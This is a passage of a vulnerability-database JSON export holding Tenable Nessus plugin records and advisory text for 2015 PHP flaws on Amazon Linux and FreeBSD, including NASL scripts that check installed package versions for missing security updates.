5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-4644", "CVE-2015-1352", "CVE-2015-4642", "CVE-2015-4022", "CVE-2015-4643"], "modified": "2016-07-06T01:25:00", "href": "https://support.f5.com/csp/article/K80285422", "id": "F5:K80285422", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:39:58", "references": ["https://alas.aws.amazon.com/ALAS-2015-535.html"], "pluginID": "83974", "description": "An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-4021)\n\nAn integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-4022)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024)\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4025)\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026)", "edition": 5, "reporter": "Tenable", "published": "2015-06-04T00:00:00", "title": "Amazon Linux AMI : php55 (ALAS-2015-535)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php55-debuginfo", "p-cpe:/a:amazon:linux:php55-mssql", "p-cpe:/a:amazon:linux:php55-fpm", "p-cpe:/a:amazon:linux:php55-pspell", "p-cpe:/a:amazon:linux:php55", "p-cpe:/a:amazon:linux:php55-tidy", "p-cpe:/a:amazon:linux:php55-opcache", "p-cpe:/a:amazon:linux:php55-gd", "p-cpe:/a:amazon:linux:php55-odbc", "p-cpe:/a:amazon:linux:php55-mcrypt", "p-cpe:/a:amazon:linux:php55-recode", "p-cpe:/a:amazon:linux:php55-embedded", "p-cpe:/a:amazon:linux:php55-gmp", "p-cpe:/a:amazon:linux:php55-mbstring", "p-cpe:/a:amazon:linux:php55-pdo", "p-cpe:/a:amazon:linux:php55-cli", "p-cpe:/a:amazon:linux:php55-soap", "p-cpe:/a:amazon:linux:php55-imap", "p-cpe:/a:amazon:linux:php55-dba", "p-cpe:/a:amazon:linux:php55-xml", "p-cpe:/a:amazon:linux:php55-devel", "p-cpe:/a:amazon:linux:php55-intl", "p-cpe:/a:amazon:linux:php55-common", "p-cpe:/a:amazon:linux:php55-enchant", "p-cpe:/a:amazon:linux:php55-pgsql", "p-cpe:/a:amazon:linux:php55-process", "p-cpe:/a:amazon:linux:php55-snmp", "p-cpe:/a:amazon:linux:php55-xmlrpc", "p-cpe:/a:amazon:linux:php55-ldap", "p-cpe:/a:amazon:linux:php55-bcmath", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:php55-mysqlnd"], "id": "ALA_ALAS-2015-535.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83974", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-535.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83974);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4025\", \"CVE-2015-4026\");\n script_xref(name:\"ALAS\", value:\"2015-535\");\n\n script_name(english:\"Amazon Linux AMI : php55 (ALAS-2015-535)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An integer underflow flaw leading to out-of-bounds memory access was\nfound in the way PHP's Phar extension parsed Phar archives. A\nspecially crafted archive could cause PHP to crash or, possibly,\nexecute arbitrary code when opened. (CVE-2015-4021)\n\nAn integer overflow flaw leading to a heap based buffer overflow was\nfound in the way PHP's FTP extension parsed file listing FTP server\nresponses. A malicious FTP server could use this flaw to cause a PHP\napplication to crash or, possibly, execute arbitrary code.\n(CVE-2015-4022)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount\nof CPU time. (CVE-2015-4024)\n\nIt was found that certain PHP functions did not properly handle file\nnames containing a NULL character. A remote attacker could possibly\nuse this flaw to make a PHP script access unexpected files and bypass\nintended file system access restrictions. (CVE-2015-4025)\n\nIt was found that certain PHP functions did not properly handle file\nnames containing a NULL character. A remote attacker could possibly\nuse this flaw to make a PHP script access unexpected files and bypass\nintended file system access restrictions. (CVE-2015-4026)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-535.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php55' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php55-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-bcmath-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-cli-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-common-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-dba-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-debuginfo-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-devel-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-embedded-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-enchant-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-fpm-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gd-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gmp-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-imap-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-intl-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-ldap-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mbstring-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mcrypt-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mssql-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mysqlnd-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-odbc-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-opcache-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pdo-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pgsql-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-process-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pspell-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-recode-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-snmp-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-soap-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-tidy-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-xml-5.5.25-1.101.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-xmlrpc-5.5.25-1.101.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php55 / php55-bcmath / php55-cli / php55-common / php55-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-13T17:08:31", "references": ["https://php.net/ChangeLog-5.php#5.6.9", "http://www.nessus.org/u?00a4bbe6"], "pluginID": "83792", "description": "PHP development team reports :\n\nFixed bug #69364 (PHP Multipart/form-data remote DoS Vulnerability).\n(CVE-2015-4024)\n\nFixed bug #69418 (CVE-2006-7243 fix regressions in 5.4+).\n(CVE-2015-4025)\n\nFixed bug #69545 (Integer overflow in ftp_genlist() resulting in heap overflow). (CVE-2015-4022)\n\nFixed bug #68598 (pcntl_exec() should not allow null char).\n(CVE-2015-4026)\n\nFixed bug #69453 (Memory Corruption in phar_parse_tarfile when entry filename starts with null). (CVE-2015-4021)", "edition": 5, "reporter": "Tenable", "published": "2015-05-26T00:00:00", "title": "FreeBSD : php -- multiple vulnerabilities (31de2e13-00d2-11e5-a072-d050996490d0)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:php5", "p-cpe:/a:freebsd:freebsd:php55", "p-cpe:/a:freebsd:freebsd:php56"], "id": "FREEBSD_PKG_31DE2E1300D211E5A072D050996490D0.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83792", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83792);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/11/10 11:49:44\");\n\n script_cve_id(\"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4025\", \"CVE-2015-4026\");\n\n script_name(english:\"FreeBSD : php -- multiple vulnerabilities (31de2e13-00d2-11e5-a072-d050996490d0)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP development team reports :\n\nFixed bug #69364 (PHP Multipart/form-data remote DoS Vulnerability).\n(CVE-2015-4024)\n\nFixed bug #69418 (CVE-2006-7243 fix regressions in 5.4+).\n(CVE-2015-4025)\n\nFixed bug #69545 (Integer overflow in ftp_genlist() resulting in heap\noverflow). (CVE-2015-4022)\n\nFixed bug #68598 (pcntl_exec() should not allow null char).\n(CVE-2015-4026)\n\nFixed bug #69453 (Memory Corruption in phar_parse_tarfile when entry\nfilename starts with null). (CVE-2015-4021)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://php.net/ChangeLog-5.php#5.6.9\"\n );\n # https://vuxml.freebsd.org/freebsd/31de2e13-00d2-11e5-a072-d050996490d0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?00a4bbe6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5<5.4.41\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55<5.5.25\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56<5.6.9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:37:14", "references": ["https://alas.aws.amazon.com/ALAS-2015-534.html"], "pluginID": "83973", "description": "An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-4021)\n\nAn integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-4022)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024)\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4025)\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026)\n\nPCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2325)\n\nPCRE library is prone to a vulnerability which leads to Heap overflow.\nWithout enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application.\n(CVE-2015-2326)", "edition": 5, "reporter": "Tenable", "published": "2015-06-04T00:00:00", "title": "Amazon Linux AMI : php54 (ALAS-2015-534)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php54-process", "p-cpe:/a:amazon:linux:php54-dba", "p-cpe:/a:amazon:linux:php54-xml", "p-cpe:/a:amazon:linux:php54-cli", "p-cpe:/a:amazon:linux:php54-mysql", "p-cpe:/a:amazon:linux:php54-mssql", "p-cpe:/a:amazon:linux:php54-soap", "p-cpe:/a:amazon:linux:php54", "p-cpe:/a:amazon:linux:php54-fpm", "p-cpe:/a:amazon:linux:php54-intl", "p-cpe:/a:amazon:linux:php54-gd", "p-cpe:/a:amazon:linux:php54-snmp", "p-cpe:/a:amazon:linux:php54-mysqlnd", "p-cpe:/a:amazon:linux:php54-recode", "p-cpe:/a:amazon:linux:php54-mbstring", "p-cpe:/a:amazon:linux:php54-odbc", "p-cpe:/a:amazon:linux:php54-bcmath", "p-cpe:/a:amazon:linux:php54-ldap", "p-cpe:/a:amazon:linux:php54-pspell", "p-cpe:/a:amazon:linux:php54-imap", "p-cpe:/a:amazon:linux:php54-pdo", "p-cpe:/a:amazon:linux:php54-pgsql", "p-cpe:/a:amazon:linux:php54-tidy", "p-cpe:/a:amazon:linux:php54-mcrypt", "p-cpe:/a:amazon:linux:php54-embedded", "p-cpe:/a:amazon:linux:php54-debuginfo", "p-cpe:/a:amazon:linux:php54-xmlrpc", "p-cpe:/a:amazon:linux:php54-devel", "p-cpe:/a:amazon:linux:php54-enchant", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:php54-common"], "id": "ALA_ALAS-2015-534.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83973", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-534.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83973);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-2325\", \"CVE-2015-2326\", \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4025\", \"CVE-2015-4026\");\n script_xref(name:\"ALAS\", value:\"2015-534\");\n\n script_name(english:\"Amazon Linux AMI : php54 (ALAS-2015-534)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An integer underflow flaw leading to out-of-bounds memory access was\nfound in the way PHP's Phar extension parsed Phar archives. A\nspecially crafted archive could cause PHP to crash or, possibly,\nexecute arbitrary code when opened. (CVE-2015-4021)\n\nAn integer overflow flaw leading to a heap based buffer overflow was\nfound in the way PHP's FTP extension parsed file listing FTP server\nresponses. A malicious FTP server could use this flaw to cause a PHP\napplication to crash or, possibly, execute arbitrary code.\n(CVE-2015-4022)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount\nof CPU time. (CVE-2015-4024)\n\nIt was found that certain PHP functions did not properly handle file\nnames containing a NULL character. A remote attacker could possibly\nuse this flaw to make a PHP script access unexpected files and bypass\nintended file system access restrictions. (CVE-2015-4025)\n\nIt was found that certain PHP functions did not properly handle file\nnames containing a NULL character. A remote attacker could possibly\nuse this flaw to make a PHP script access unexpected files and bypass\nintended file system access restrictions. (CVE-2015-4026)\n\nPCRE library is prone to a heap overflow vulnerability. Due to\ninsufficient bounds checking inside compile_branch(), the heap memory\ncould be overflowed via a crafted regular expression. Since PCRE\nlibrary is widely used, this vulnerability should affect many\napplications using it. An attacker may exploit this issue to execute\narbitrary code in the context of the user running the affected\napplication. (CVE-2015-2325)\n\nPCRE library is prone to a vulnerability which leads to Heap overflow.\nWithout enough bound checking inside pcre_compile2(), the heap memory\ncould be overflowed via a crafted regular expression. Since PCRE\nlibrary is widely used, this vulnerability should affect many\napplications. An attacker may exploit this issue to execute arbitrary\ncode in the context of the user running the affected application.\n(CVE-2015-2326)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-534.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php54' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pspell\");\n 